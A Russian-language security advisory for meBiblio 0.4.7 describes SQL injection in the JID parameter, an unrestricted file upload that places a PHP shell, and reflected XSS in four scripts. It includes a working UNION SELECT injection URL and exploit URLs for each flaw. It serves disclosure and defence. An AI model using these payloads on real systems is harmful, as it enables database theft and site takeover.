Программа: meBiblio 0.4.7
Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, загрузить произвольные файлы на целевую систему и выполнить произвольный
SQL код в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «JID» сценарием journal_change_mask.inc.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.
Эксплоит:
http://[target]/[path]/admin/journal_change_mask.inc.php?JID=
1%20union%20select%201,PACS_description,1,1%20FROM%20 pacs%20where%20PACS_ID=2
2) Уязвимость существует из-за ошибки в проверке входных данных в
uploader.html. Атакующий может загрузить произвольные файлы на целевую систему.
Пример:
Путь к загрузке сценариев: http://[target]/[path]/upload/uploader.html
Сценарий Shell: http://[target]/[path]/files/evil.php
3) Уязвимость существует из-за недостаточной обработки входных данных
сценариями dbadd.inc.php, add_journal_mask.inc.php, insert_mask.inc.php и
search_mask.inc.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>